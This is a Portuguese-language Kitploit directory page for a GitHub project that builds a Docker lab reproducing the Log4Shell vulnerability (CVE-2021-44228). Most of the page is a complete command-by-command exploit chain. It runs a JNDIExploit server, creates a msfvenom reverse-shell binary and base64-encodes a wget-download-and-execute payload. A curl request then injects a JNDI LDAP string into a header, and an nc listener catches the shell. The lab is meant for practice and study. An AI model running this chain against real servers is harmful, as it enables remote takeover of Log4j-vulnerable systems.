Skip to content
KitploitKITPLOIT
FerramentasBlog
Enviar
FerramentasBlog
Enviar

Ferramentas de Hacking, PenTest e Cibersegurança para o seu Arsenal de Segurança!

Kitploit é um diretório de ferramentas de hacking, cibersegurança e pentesting. Descubra as últimas atualizações de projetos para encontrar vulnerabilidades, analisar sistemas, automatizar testes e fortalecer sua segurança.

··Feeds·Contato·Privacidade·© 2026 Kitploit

Diretório de Ferramentas

Categorias

Ver todas as categorias
Loading categories
Log4Shell-CVE-2021-44228-ENV — Log4Shell Docker Env | Kitploit
Ferramentas/GitHubGitHub/ycdxsb/log4shell-cve-2021-44228-env
Segurança de ContêineresAnálise de VulnerabilidadesExploraçãoExploração de Aplicações WebAprendizado e EducaçãoLabs e Prática
GitHubycdxsb/log4shell-cve-2021-44228-env

Log4Shell-CVE-2021-44228-ENV

Log4Shell Docker Env

Ver Repositório
414há 4 anosAinda não revisado

Mais Populares

Ver todos →

Descubra as ferramentas mais usadas pela nossa comunidade.

Explore todas as ferramentas

Navegue pela nossa coleção de ferramentas

Ver todas as ferramentas →
Compartilhar

Ambiente de reprodução do Log4Shell

Descrição do exemplo

IP da máquina atacada: 47.47.47.47

IP da máquina atacante: 48.48.48.48

Docker da máquina atacada executando a vulnerabilidade

  • Usar DockerFile para construir a imagem Docker e executar:
root@kitploit:~
docker build . -t vuln
docker run -p 8080:8080 --name vuln vuln

Docker da máquina atacante executando o ataque

  • Usar DockerFile para construir a imagem Docker e executar
root@kitploit:~
docker build . -t attack
docker run -itd -p 9999:9999 -p 8888:8888 -p 1389:1389 -p 9000:9000 --name attack attack

Preparação do ambiente da máquina atacante

Executar comandos em três shells diferentes, garantir que os shells estejam ativos

  • Iniciar servidor JDNI na máquina atacante
root@kitploit:~
docker exec -it attack /bin/bash
java -jar JNDIExploit-1.2-SNAPSHOT.jar -i 48.48.48.48 -p 8888
  • Iniciar servidor HTTP na máquina atacante
root@kitploit:~
docker exec -it attack /bin/bash
python3 -m http.server 9999
  • Ouvir porta com nc na máquina atacante
root@kitploit:~
docker exec -it attack /bin/bash
nc -lvvp 9000

Realizar o ataque na máquina atacante

Executar comandos no mesmo shell

root@kitploit:~
docker exec -it attack /bin/bash
  • Preparar arquivo de reverse shell na máquina atacante
root@kitploit:~
msfvenom -p linux/x64/shell_reverse_tcp LHOST=48.48.48.48 LPORT=9000 -f elf -o /rev.elf
  • Preparar payload na máquina atacante
root@kitploit:~
echo 'wget http://48.48.48.48:9999/rev.elf -O /tmp/rev.elf && chmod +x /tmp/rev.elf && /tmp/rev.elf' | base64
# d2dldCBodHRwOi8vNDguNDguNDguNDg6OTk5OS9yZXYuZWxmIC1PIC90bXAvcmV2LmVsZiAmJiBjaG1vZCAreCAvdG1wL3Jldi5lbGYgJiYgL3RtcC9yZXYuZWxmCg==
  • Enviar o payload de ataque
root@kitploit:~
curl 47.47.47.47:8080 -H 'X-Api-Version: ${jndi:ldap://48.48.48.48:1389/Basic/Command/Base64/d2dldCBodHRwOi8vNDguNDguNDguNDg6OTk5OS9yZXYuZWxmIC1PIC90bXAvcmV2LmVsZiAmJiBjaG1vZCAreCAvdG1wL3Jldi5lbGYgJiYgL3RtcC9yZXYuZWxmCg==}'

Geração de comandos

root@kitploit:~
python3 command_gen.py vuln_ip attack_ip

Demonstração em vídeo

Video

Referências

  • https://github.com/christophetd/log4shell-vulnerable-app
  • https://github.com/twseptian/Spring-Boot-Log4j-CVE-2021-44228-Docker-Lab
Baixar ferramenta